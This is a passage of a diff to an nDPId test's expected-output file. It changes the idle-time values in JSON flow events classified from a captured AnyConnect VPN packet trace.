00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687247596,"flow_last_seen":1569687248620,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260772,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00912{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687245379,"flow_last_seen":1569687245725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8058,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1569687245688,"flow_last_seen":1569687268830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22452,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -01035{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1569687267035,"flow_last_seen":1569687288923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21688,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687268339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
-00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687268339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687267453,"flow_last_seen":1569687267455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687267453,"flow_last_seen":1569687267455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569687269561,"flow_last_seen":1569687269570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1195,"flow_tot_l4_payload_len":1446,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}} 
+00912{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687245379,"flow_last_seen":1569687245725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8058,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1569687245688,"flow_last_seen":1569687268830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22452,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+01035{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1569687267035,"flow_last_seen":1569687288923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21688,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687268339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687268339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687267453,"flow_last_seen":1569687267455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687267453,"flow_last_seen":1569687267455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AJP","breed":"Acceptable","category":"Web"}} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569687269561,"flow_last_seen":1569687269570,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1195,"flow_tot_l4_payload_len":1446,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 
